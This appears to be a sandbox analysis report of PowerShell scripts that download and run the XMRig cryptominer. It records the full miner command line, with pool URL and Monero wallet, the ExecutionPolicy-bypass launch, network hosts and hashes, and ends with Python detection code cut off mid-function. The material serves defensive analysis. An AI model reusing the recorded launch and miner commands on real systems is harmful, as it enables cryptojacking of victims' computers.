N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3932-0-0x00007FFE5BA93000-0x00007FFE5BA95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qj5lgtmb.5ai.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3932-9-0x000001953DA70000-0x000001953DA92000-memory.dmp

memory/3932-10-0x00007FFE5BA90000-0x00007FFE5C552000-memory.dmp

memory/3932-11-0x00007FFE5BA90000-0x00007FFE5C552000-memory.dmp

memory/3932-12-0x00007FFE5BA90000-0x00007FFE5C552000-memory.dmp

memory/3932-14-0x0000019556550000-0x0000019556562000-memory.dmp

memory/3932-15-0x000001953DC50000-0x000001953DC5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1848-46-0x000002C6BCDA0000-0x000002C6BCDC0000-memory.dmp

memory/1848-47-0x000002C6BE7A0000-0x000002C6BE7C0000-memory.dmp

memory/1848-48-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/3932-50-0x00007FFE5BA90000-0x00007FFE5C552000-memory.dmp

memory/1848-49-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-51-0x000002C6BE7E0000-0x000002C6BE800000-memory.dmp

memory/1848-52-0x000002C6BE7C0000-0x000002C6BE7E0000-memory.dmp

memory/3932-53-0x00007FFE5BA93000-0x00007FFE5BA95000-memory.dmp

memory/1848-54-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-55-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-56-0x000002C6BE7E0000-0x000002C6BE800000-memory.dmp

memory/1848-57-0x000002C6BE7C0000-0x000002C6BE7E0000-memory.dmp

memory/1848-58-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-59-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-60-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-61-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-62-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-63-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-64-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-65-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-66-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-67-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-68-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-69-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-70-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-71-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-72-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-73-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-74-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-75-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-76-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-77-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-78-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-79-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-80-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-81-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-82-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-83-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-84-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-85-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-86-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-87-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-88-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-89-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-90-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-91-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-92-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-93-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-94-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-95-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-96-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-97-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-98-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-99-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-100-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-101-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-102-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-103-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-104-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-105-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-106-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-107-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-108-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-109-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-110-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-111-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-112-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-113-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-114-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-115-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

memory/1848-116-0x00007FF7519F0000-0x00007FF752623000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:51

Platform

win10-20240404-en

Max time kernel

1789s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows; every field N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp

Files

memory/1468-4-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/1468-5-0x0000016FCC6B0000-0x0000016FCC6D2000-memory.dmp

memory/1468-8-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-9-0x0000016FCC860000-0x0000016FCC8D6000-memory.dmp

memory/1468-10-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_basnbjvx.abk.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1468-25-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-61-0x0000016FCC840000-0x0000016FCC84A000-memory.dmp

memory/1468-48-0x0000016FCC9E0000-0x0000016FCC9F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/64-90-0x000001D4DC7E0000-0x000001D4DC800000-memory.dmp

memory/64-91-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-92-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/1468-93-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/1468-94-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/64-95-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-96-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-97-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-98-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-99-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-100-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-101-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-102-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-103-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-104-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-105-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-106-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-107-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-108-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-109-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-110-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-111-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-112-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-113-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-114-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-115-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-116-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-117-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-118-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-119-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-120-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-121-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-122-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-123-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-124-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-125-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-126-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-127-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-128-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-129-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-130-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-131-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-132-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-133-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-134-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-135-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-136-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-137-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-138-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-139-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-140-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-141-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-142-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-143-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-144-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-145-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-146-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-147-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-148-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-149-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-150-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-151-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-152-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-153-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-154-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

memory/64-155-0x00007FF7AA040000-0x00007FF7AAC73000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:50

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows; every field N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 213.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp

Files

memory/2828-3-0x00007FFA7ECD3000-0x00007FFA7ECD4000-memory.dmp

memory/2828-5-0x0000029B43B30000-0x0000029B43B52000-memory.dmp

memory/2828-7-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

memory/2828-9-0x0000029B43CE0000-0x0000029B43D56000-memory.dmp

memory/2828-10-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilulcm5l.nyb.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2828-26-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

memory/2828-49-0x0000029B43CC0000-0x0000029B43CD2000-memory.dmp

memory/2828-62-0x0000029B43A70000-0x0000029B43A7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/432-91-0x00000254E5340000-0x00000254E5360000-memory.dmp

memory/432-92-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/432-93-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp

memory/2828-94-0x00007FFA7ECD3000-0x00007FFA7ECD4000-memory.dmp

memory/2828-95-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

memory/2828-96-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

memory/432-{97..157}-0x00007FF6CE070000-0x00007FF6CECA3000-memory.dmp (61 consecutive dumps of the same region)

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:57

Platform

win7-20240508-en

Max time kernel

1565s

Max time network

1566s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Network

N/A

Files

memory/2176-4-0x000007FEF5BEE000-0x000007FEF5BEF000-memory.dmp

memory/2176-5-0x000000001B790000-0x000000001BA72000-memory.dmp

memory/2176-6-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

memory/2176-7-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2176-8-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2176-9-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2176-10-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2176-11-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:01

Platform

win10-20240404-en

Max time kernel

1793s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; the report records no description, indicator, process or target for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

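The two process command lines above are the whole infection chain in miniature: powershell.exe started with an ExecutionPolicy bypass on a script under the user's Temp folder, which then fetches and runs xmrig.exe with the pool (stratum+ssl://rx.unmineable.com:443), the payout identity (XMR:<address>.<worker>) and the pool password ("x") passed on the command line. The __PSScriptPolicyTest_*.ps1 entries listed under Files are not part of the payload: PowerShell writes that file on start-up to test whether AppLocker/WDAC script enforcement applies, and the MD5 c4ca4238a0b923820dcc509a6f75849b recorded for it is simply the MD5 of the one-byte body "1". The following Python is an added example written for this page, not code from the sandbox vendor or from the sample: it tokenises a process command line, pulls pool, coin, wallet and worker out of xmrig's arguments, flags the PowerShell launch pattern, and recognises the benign policy-probe file by its hash. The sample command lines are constructed from the rows above; the rule names, the 95-character base58 check on the Monero address and the choice to treat only stratum schemes as a miner indicator are the example's own assumptions.

```python
import hashlib
import re
import shlex
from urllib.parse import urlsplit

# Constructed sample input: the two process command lines recorded for the
# behavioral14 detonation, plus one msedge.exe line as a benign control.
SAMPLE_CMDLINES = [
    'powershell.exe -ExecutionPolicy bypass -File '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\file01 - copia (5).ps1"',
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" -a rx '
    '-o stratum+ssl://rx.unmineable.com:443 '
    '-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac '
    '-p x',
    '"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" '
    '--type=utility --lang=en-US',
]

STRATUM_SCHEMES = {"stratum", "stratum+tcp", "stratum+ssl", "stratum+tls"}
# Base58 alphabet, 95 characters: the length of a standard Monero address
# (assumption used as a sanity check, not a full address validation).
XMR_ADDR_RE = re.compile(r"^[1-9A-HJ-NP-Za-km-z]{95}$")
PS_BYPASS_RE = re.compile(r"-(?:ExecutionPolicy|ep|exec)\s+bypass\b", re.IGNORECASE)
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# MD5 of the one-byte body "1", which is what PowerShell writes into
# __PSScriptPolicyTest_<random>.ps1 to probe AppLocker/WDAC script enforcement.
PROBE_MD5 = hashlib.md5(b"1").hexdigest()


def split_cmdline(cmdline: str) -> list:
    """Tokenise a Windows command line; non-POSIX mode keeps backslashes literal."""
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def xmrig_options(tokens: list) -> dict:
    """Pick out xmrig's pool options in both '-o url' and '--url=url' forms."""
    names = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
             "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}
    opts, i = {}, 0
    while i < len(tokens):
        key, eq, val = tokens[i].partition("=")
        if eq and key in names:
            opts[names[key]] = val
        elif tokens[i] in names and i + 1 < len(tokens):
            opts[names[tokens[i]]] = tokens[i + 1]
            i += 1                      # the value token has been consumed
        i += 1
    return opts


def miner_config(cmdline: str):
    """Pool/wallet settings if the command line drives a stratum miner, else None.
    A miner configured through config.json instead of arguments is not caught here."""
    opts = xmrig_options(split_cmdline(cmdline)[1:])
    url = urlsplit(opts.get("url", ""))
    if url.scheme not in STRATUM_SCHEMES:
        return None
    user = opts.get("user", "")
    # unMineable convention: COIN:<payout address>.<worker name>
    m = re.match(r"^([A-Z0-9]+):([^.]+)(?:\.(.+))?$", user)
    if m:
        coin, wallet, worker = m.groups()
    else:                               # plain <address>.<worker> for other pools
        coin, (wallet, _, worker) = None, user.partition(".")
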